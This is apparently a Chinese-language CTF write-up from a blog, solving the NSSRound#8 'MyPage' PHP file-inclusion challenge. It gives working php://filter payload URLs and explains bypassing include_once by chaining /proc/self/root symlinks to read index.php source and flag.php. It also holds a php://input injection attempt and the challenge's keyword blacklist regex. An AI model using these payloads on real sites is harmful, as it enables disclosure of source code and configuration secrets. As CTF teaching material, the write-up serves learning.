[NSSRound#8 Basic]MyPage

最新推荐文章于 2024-06-23 15:33:40 发布
最新推荐文章于 2024-06-23 15:33:40 发布
阅读量1.2k 收藏 16
点赞数 21
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756016/article/details/137289712
版权

[NSSRound#8 Basic]MyPage

打开页面后什么都没有

尝试使用php伪协议

//读取文件源码
file=php://filter/read=convert.base64-encode/resource=index.php
显示:空白一片
file=php://filter/read=convert.base64-encode/resource=/var/www/html/index.php
显示:error.
//写入一句话木马
file=php://input
<?php phpinfo();?>
显示:error.

猜测可能是require_once()函数
require():找不到被包含的文件会产生致命错误,并停止脚本运行

require_once()与require()类似:唯一的区别是如果该文件的代码已经被包含,则不会再次包含

然后我去寻找了一下require_once() 函数的绕过方法

[CTF]proc目录的应用_ctf 绕过require_once限制-CSDN博客

/proc目录

Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc 是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。

简单来讲,/proc 目录即保存在系统内存中的信息,大多数虚拟文件可以使用文件查看命令如cat、more或者less进行查看,有些文件信息表述的内容可以一目了然,但也有文件的信息却不怎么具有可读性。

/proc 目录中包含许多以数字命名的子目录,这些数字表示系统当前正在运行进程的进程号(PID),里面包含对应进程相关的多个信息文件:

ls -al /proc

每一个进程对应许多相关文件

ls -al /proc/12

cwd

cwd 文件是一个指向当前进程运行目录的符号链接。可以通过查看cwd文件获取目标指定进程环境的运行目录:

ls -al /proc/12/cwd
self

/proc/self 表示当前进程目录。我们可以通过/proc/$pid/来获取指定进程的信息,这个方法需要知道进程pid。为了更方便的获取本进程的信息,linux提供了/proc/self目录,等价于/proc/本进程pid

总之

/proc/self/cwd  就相当于当前目录

绕过require_once() 函数原理

场景描述:我们在审计时找到一处文件包含漏洞(使用require_once或include_once),想利用这个漏洞读取一下数据库配置文件之类的源码,通常可以使用php://filter/convert.base64-encode/resource=file这样的方式将文件以base64的形式读出来。但如果这个文件在前面已经被包含过了,则第二次包含就会失败,即使使用php://filter也一样。

此时我们可以使用“多重软连接”,正常情况下,PHP会将用户输入的文件名进行resolve,转换成标准的绝对路径,这个转换的过程会将…/、./、软连接等都进行计算,得到一个最终的路径,再进行包含。每次包含都会经历这个过程,所以,只要是相同的文件,不管中间使用了…/进行跳转,还是使用软连接进行跳转,都逃不过最终被转换成原始路径的过程,也就绕不过require_once。

但是,如果软连接跳转的次数超过了某一个上限,Linux的lstat函数就会出错,导致PHP计算出的绝对路径就会包含一部分软连接的路径,也就和原始路径不相同的,即可绕过require_once限制。 在Linux下,最常见的软连接就是/proc/self/root,这个路径指向根目录。所以,我们可以多次使用这个路径:

<?php
require_once '/www/config.php';
include_once '/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/www/config.php';

这样即可包含两次/www/config.php

尝试配合读取文件源码的伪协议绕过

payload:
/index.php?file=php://filter/read=convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/index.php

得到base64编码的网页源码

<?php
error_reporting(0);

include 'flag.php';

if(!isset($_GET['file'])) {
    header('Location:/index.php?file=');
} else {
    $file = $_GET['file'];

    if (!preg_match('/\.\.|data|input|glob|global|var|dict|gopher|file|http|phar|localhost|\?|\*|\~|zip|7z|compress/is', $file)) {
        include_once $file;
    } else {
        die('error.');
    }
}

直接查看flag

/index.php?file=php://filter/read=convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/flag.php

阿呆不呆@qq
关注
  • 21
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[NSSRound#8 Basic] MyPage
weixin_68906365的博客
03-11 393
打开后给了一个参数file。尝试使用php伪协议读取index.php的源码,发现无法读取。
[NSSRound#8 Basic]MyDoor
m0_70819573的博客
03-05 428
用base64读取index.php的源码,发现可以传参N_S.S进行命令执行,由于php的特性,在后端会被规范成N_S_S。1.打开环境,审计代码,一个file后门。所以用N[S.S传参。
NSSROUND#8[Basic]
Aiwin的博客
02-12 874
NSSROUND#8[Basic]
(超详细)[NSSRound#8 Basic]MyPage
qq_74426248的博客
07-29 249
本文章是[NSSRound#8 Basic]MyPage的解题过程,文章有不足之处,还请各位师傅指正。
NSSRound#8 WEB部分
ph0ebus的博客
02-13 727
只做出来My系列两道题,记录一下学到的知识叭。
【Web】NSSRound#1-20 Basic 刷题记录(全)
uuzeray的博客
04-11 1794
3、之后执行content.innerHTML = data.message.content,发生报错,执行Error.prepareStackTrace,通过 callsite.getFunction()获取当前调用栈的函数,也就56-65这段的匿名函数,再callsite.getFunction()(),让这段匿名函数再次执行。1、插入了img标签,使得56-65这段匿名函数执行停止,去加载img外部引用,因为没有外部引用,所以触发img的error,执行js代码。提供应用的健康信息。
NSSCTF Round#8 Basic
v2ish1yan的博客
02-11 1518
根据出题人的本意是让我们上传一个包,然后去加载那个包,但是我是直接用的别人的exp,而且题目环境也包含exp里需要的文件,所以直接打就行。感觉部分源码和MyDoor是一样的,只是我尝试用伪协议读取index.php的时候没回显,所以猜测应该就是用了include来读取文件。发现可以执行命令,因为php的特性如果执行给N_S.S传参,那么N_S.S在后端会被规范成N_S_S。所以使用N[S.S来使后端得到的参数为N_S.S(具体原因自己去搜吧)之前的字符串的命令,并且是对你上传的文件进行执行的,(猜的)
NSSCTF Round#8 web专项赛
qq_61768489的博客
02-13 1018
文件包含
[NSSCTF Round #8]——web专项赛wp
Leaf_initial的博客
07-04 838
根据出题人的本意是让我们上传一个包,然后去加载那个包require得到的是module.exports的内容,所以先上传一个js文件好像是没有curl这个命令,所以这里要用wget。总之,该应用程序使用 Express 框架创建了一个服务器,监听指定的端口,处理文件上传请求和污染请求,并提供静态文件服务。一开始打算用data协议,或者filter协议进行内容读取,但是好像都被ban掉了,上网查了查资料,要利用对。go语言文件上传,他说没有过滤,暂且信他一手,上网查了一下go文件上传。
mypage
03-08
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: yarn start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何...
mypage:我的第一个 html 页面
05-30
我的页面导航栏的演示我正在使用Visual Studio编辑器。
MyPage
03-26
MyPage
Android14 开发之Broadcast延迟及Service常驻等新特性说明
虎哥LoveDroid
06-20 914
通过以上步骤,您可以在 Android 13 中根据Intent的action启动服务,并确保服务在后台运行时不会被系统终止。使用前台服务可以确保服务的持久性,并且可以处理新的权限要求和行为变化。
Android SurfaceFlinger——注册监听调用流程(七)
小旭的专栏
06-21 519
这一篇我们介绍一下 IComposer 中的另一个比较重要的方法,通过注册监听 Hal 层实现监听驱动的关键动作。
android CancellationException 了解
阿饱同学
06-21 336
Android开发中,通常是在协程或预期完成的任务被取消时遇到的异常。这种异常是Kotlin协程的一部分,也可以在各种异步任务管理库中找到。
深入了解PHP的If...Else语句
Perfect—完美的博客
06-20 486
if…else语句用于根据条件执行不同的代码块。if (条件) {// 当条件为真时执行的代码} else {// 当条件为假时执行的代码if…else语句是PHP中最基础也是最重要的控制结构之一。通过使用if、if…else、if…elseif…else以及嵌套if语句,可以实现复杂的条件判断逻辑。条件运算符和switch语句提供了更加简洁和高效的代码写法。掌握这些控制结构的用法,将有助于你编写更加灵活和健壮的PHP代码。
Android RecyclerView原理语法和用法
micro9981的专栏
06-20 790
Android 中用于显示大量数据的高级视图组件。它是 的改进版,具有更高的性能和灵活性。以下是关于 的详细介绍,包括其原理、语法、优缺点和使用方法。 的核心原理是通过视图复用来提高性能。当用户滚动列表时, 只会创建和绑定当前可见的项,而不是为每个数据项都创建一个新的视图。这是通过 ViewHolder 模式和 Adapter 来实现的。使用 的基本步骤包括: 优缺点 优点 性能优越: 通过视图复用和 ViewHolder 模式, 能够有效减少内存使用和提高滚动性能。 灵活性高: 支持不
Android——ViewModel需要有参构造报错
最新发布
桂的博客
06-23 148
Android——ViewModel需要有参构造报错
在MyFolder目录下创建空的MyPage.Html文件
06-07
好的,您可以在命令行中输入以下指令来在“MyFolder”目录下创建空的“MyPage.html”文件: ``` type nul > MyPage.html ``` 或者您可以在“MyFolder”目录下右键点击空白处,选择“新建” -> “文本文档”,将其...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值